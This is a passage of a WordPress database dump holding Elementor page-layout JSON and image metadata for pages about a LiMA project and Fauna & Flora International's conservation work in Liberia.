More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lima\\\",\\\"tag_id\\\":\\\"58\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lima\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55f0c58f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"126f7a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"41e8be5a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1f1d95fa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lima\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(21984,3190,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(21986,1606,'_thumbnail_id','3189'),(21987,3191,'_elementor_edit_mode','builder'),(21988,3191,'_elementor_template_type','wp-post'),(21989,3191,'_elementor_version','2.7.5'),(21990,3191,'_wp_page_template','default'),(21991,3191,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA coming soon!<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cce3400\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"18267993\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"37219f1f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ab5334\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lima\\\",\\\"tag_id\\\":\\\"58\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lima\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55f0c58f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"126f7a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"41e8be5a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1f1d95fa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lima\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(21992,3191,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(21994,3191,'_thumbnail_id','3189'),(21995,3192,'_wp_attached_file','2019/11/ff.jpg'),(21996,3192,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:14:\"2019/11/ff.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"ff-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"ff-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"ff-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21997,3193,'_elementor_edit_mode','builder'),(21998,3193,'_elementor_template_type','wp-post'),(21999,3193,'_elementor_version','2.7.5'),(22000,3193,'_wp_page_template','default'),(22001,3193,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(22002,3193,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(22003,3193,'_thumbnail_id','3111'),(22005,3194,'_wp_attached_file','2020/06/wcf.png'),(22006,3194,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2020/06/wcf.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"wcf-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"wcf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"wcf-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22007,3195,'_elementor_edit_mode','builder'),(22008,3195,'_elementor_template_type','wp-post'),(22009,3195,'_elementor_version','2.8.1'),(22010,3195,'_wp_page_template','default'),(22011,3195,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":